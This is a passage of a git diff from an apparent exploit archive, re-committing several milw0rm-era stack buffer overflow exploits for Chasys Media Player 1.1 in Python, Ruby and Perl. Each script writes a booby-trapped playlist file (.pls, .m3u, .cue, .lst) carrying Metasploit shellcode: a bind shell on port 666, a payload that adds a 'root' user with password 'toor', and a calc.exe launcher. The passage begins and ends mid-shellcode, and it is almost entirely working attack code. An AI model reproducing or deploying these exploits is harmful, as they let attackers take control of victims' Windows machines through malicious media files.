+"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37" +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58" +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" +"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34" +"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38" +"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53" +"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57" +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a" +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53" +"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47" +"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59" +"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56" +"\x4e\x36\x43\x36\x42\x50\x5a") + + + +exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D + +try: + out_file = open("exploit.pls",'w') + out_file.write(exploit) + out_file.close() + print "Exploit File Created!" +except: + print "Error" + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/local/8234.py b/platforms/windows/local/8234.py index 97fe2245a..ff9c765c4 100755 --- a/platforms/windows/local/8234.py +++ b/platforms/windows/local/8234.py 
@@ -1,50 +1,50 @@ -#!/usr/bin/python -# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit -# By: Encrypt3d.M!nd -# -# Credit flys to: zAx -# -# the good thing in this one that the program won't crash -# when the playlist file imported,and will keep running. - - -header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D" -junk = "\x41"*260 - -eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 - -nops = "\x90" * 20 - - -# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub -http://metasploit.com -shellcode = ( -"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" -"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" -"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" -"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" -"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" -"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" -"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" -"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" -"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" -"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" -"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" -"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" -"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" -"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" -"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" -"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" -"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" -"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" -"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" -"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" 
-"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" -"\x24\xec\xe3\xeb\xa7\x13\x35\x14") - -ex = header+junk+eip+nops+shellcode -file=open("devil_inside.pls","w") -file.write(ex) -file.close() - -# milw0rm.com [2009-03-18] +#!/usr/bin/python +# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit +# By: Encrypt3d.M!nd +# +# Credit flys to: zAx +# +# the good thing in this one that the program won't crash +# when the playlist file imported,and will keep running. + + +header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D" +junk = "\x41"*260 + +eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 + +nops = "\x90" * 20 + + +# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub +http://metasploit.com +shellcode = ( +"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" +"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" +"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" +"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" +"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" +"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" +"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" +"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" +"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" +"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" +"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" +"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" +"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" +"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" +"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" +"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" +"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" 
+"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" +"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" +"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" +"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" +"\x24\xec\xe3\xeb\xa7\x13\x35\x14") + +ex = header+junk+eip+nops+shellcode +file=open("devil_inside.pls","w") +file.write(ex) +file.close() + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/local/8235.py b/platforms/windows/local/8235.py index 6714f05cd..2c5816cef 100755 --- a/platforms/windows/local/8235.py +++ b/platforms/windows/local/8235.py 
@@ -1,50 +1,50 @@ -#!/usr/bin/python -# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit -# By: Encrypt3d.M!nd -# -# Credit flys to: zAx -# -# the good thing in this one that the program won't crash -# when the playlist file imported,and will keep running. - - -header = "#EXTM3U\n" -junk = "\x41"*260 - -eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 - -nops = "\x90" * 20 - - -# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub -http://metasploit.com -shellcode = ( -"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" -"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" -"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" -"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" -"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" -"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" -"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" -"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" -"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" -"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" -"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" -"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" -"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" -"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" -"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" -"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" -"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" -"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" -"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" -"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" -"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" -"\x24\xec\xe3\xeb\xa7\x13\x35\x14") - -ex = header+junk+eip+nops+shellcode 
-file=open("devil_inside.m3u","w") -file.write(ex) -file.close() - -# milw0rm.com [2009-03-18] +#!/usr/bin/python +# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit +# By: Encrypt3d.M!nd +# +# Credit flys to: zAx +# +# the good thing in this one that the program won't crash +# when the playlist file imported,and will keep running. + + +header = "#EXTM3U\n" +junk = "\x41"*260 + +eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 + +nops = "\x90" * 20 + + +# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub +http://metasploit.com +shellcode = ( +"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" +"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" +"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" +"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" +"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" +"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" +"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" +"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" +"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" +"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" +"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" +"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" +"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" +"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" +"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" +"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" +"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" +"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" +"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" +"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" +"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" 
+"\x24\xec\xe3\xeb\xa7\x13\x35\x14") + +ex = header+junk+eip+nops+shellcode +file=open("devil_inside.m3u","w") +file.write(ex) +file.close() + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/local/8242.rb b/platforms/windows/local/8242.rb index 58c885815..204e40fe1 100755 --- a/platforms/windows/local/8242.rb +++ b/platforms/windows/local/8242.rb 
@@ -1,72 +1,72 @@ -#!/usr/bin/env ruby -# Chasys Media Player 1.1 .cue file Stack Overflow Exploit -# By Stack -# Mountassif Moad -# cat thnx.txt -# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d -# -time3 = Time.new -puts "Exploit Started in Current Time :" + time3.inspect -puts "Enter Name For your File Like : Stack" -files = gets.chomp.capitalize -puts "Name Of File : " + files +'.cue' -time1 = Time.new -$VERBOSE=nil -Header1= "\x5B\x70\x6C\x61\x79\x6C\x69"+ - "\x73\x74\x5D\x0D\x46\x69\x6C"+ - "\x65\x31\x3D" - - -Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+ - "\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+ - "\x20\x30\x30\x3A\x30\x30\x3A\x30\x30" - - -# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com -Shellscode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ -"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+ -"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+ -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+ -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ -"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+ -"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+ -"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+ -"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+ -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+ -"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+ 
-"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+ -"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+ -"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+ -"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+ -"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+ -"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+ -"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+ -"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+ -"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+ -"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+ -"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+ -"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+ -"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+ -"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+ -"\x41\x54\x46\x54\x46\x54\x42\x50\x5a" -Over = "\x41" * 260 -Nop = "\x90" * 20 -Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN - # "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2 - # ( this is my methode if i dont find an universel address in app i find adress - # in some famouse softwar who the victime 90 % install it ) - -Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2 -File.open( files+".cue", "w" ) do |the_file| -the_file.puts(Xpl) -puts "Exploit finished in Current Time :" + time1.inspect -puts "Now Open " + files +".cue :d" -end - -# milw0rm.com [2009-03-19] +#!/usr/bin/env ruby +# Chasys Media Player 1.1 .cue file Stack Overflow Exploit +# By Stack +# Mountassif Moad +# cat thnx.txt +# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d +# +time3 = Time.new +puts "Exploit Started in Current Time :" + time3.inspect +puts "Enter Name For your File Like : Stack" +files = gets.chomp.capitalize +puts "Name Of File : " + files +'.cue' +time1 = Time.new +$VERBOSE=nil +Header1= 
"\x5B\x70\x6C\x61\x79\x6C\x69"+ + "\x73\x74\x5D\x0D\x46\x69\x6C"+ + "\x65\x31\x3D" + + +Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+ + "\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+ + "\x20\x30\x30\x3A\x30\x30\x3A\x30\x30" + + +# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com +Shellscode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ +"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+ +"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+ +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+ +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ +"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+ +"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+ +"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+ +"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+ +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+ +"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+ +"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+ +"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+ +"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+ +"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+ +"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+ +"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+ +"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+ 
+"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+ +"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+ +"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+ +"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+ +"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+ +"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+ +"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+ +"\x41\x54\x46\x54\x46\x54\x42\x50\x5a" +Over = "\x41" * 260 +Nop = "\x90" * 20 +Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN + # "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2 + # ( this is my methode if i dont find an universel address in app i find adress + # in some famouse softwar who the victime 90 % install it ) + +Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2 +File.open( files+".cue", "w" ) do |the_file| +the_file.puts(Xpl) +puts "Exploit finished in Current Time :" + time1.inspect +puts "Now Open " + files +".cue :d" +end + +# milw0rm.com [2009-03-19] diff --git a/platforms/windows/local/8246.pl b/platforms/windows/local/8246.pl index 83171c774..8a91bb499 100755 --- a/platforms/windows/local/8246.pl +++ b/platforms/windows/local/8246.pl 
@@ -1,31 +1,31 @@ -#!/usr/bin/perl -# -------------------------------------------------------------- -# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit -# Discovered and Exploited By : zAx -# Thanks to all my friends ! -# -------------------------------------------------------------- -my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D"; -my $junk = "\x41" x 260; -my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English .. -my $nopsleds = "\x90" x 19; # I Love you -# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/ -my $sc = -"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34". -"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6". -"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca". -"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e". -"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5". -"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7". -"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08". -"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb". -"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87". -"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb". -"\x51\x92\x42\x83"; -my $exploit = $header.$junk.$eip.$nopsleds.$sc; -$file = "zAx.lst"; -open(my $FILE, ">>$file") or die "Cannot open $file: $!"; -print $FILE $exploit ; -close($FILE); -print "Done \n"; - -# milw0rm.com [2009-03-19] +#!/usr/bin/perl +# -------------------------------------------------------------- +# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit +# Discovered and Exploited By : zAx +# Thanks to all my friends ! 
+# -------------------------------------------------------------- +my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D"; +my $junk = "\x41" x 260; +my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English .. +my $nopsleds = "\x90" x 19; # I Love you +# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/ +my $sc = +"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34". +"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6". +"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca". +"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e". +"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5". +"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7". +"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08". +"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb". +"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87". +"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb". 